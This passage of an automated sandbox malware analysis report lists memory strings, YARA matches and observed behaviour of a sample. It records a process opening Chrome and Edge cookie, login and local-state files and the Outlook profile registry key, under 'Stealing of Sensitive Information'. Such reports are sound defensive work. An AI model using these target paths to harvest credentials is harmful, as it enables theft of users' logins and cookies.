Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215612101.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924750252.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925092416.0000000001881000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215612101.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924750252.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925092416.0000000001881000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215612101.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924750252.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925092416.0000000001881000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215612101.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924750252.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925092416.0000000001881000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF6585B1544 cpuid 0_2_00007FF6585B1544
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF6585B11A0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF6585B11A0

Stealing of Sensitive Information

Source: Yara match File source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY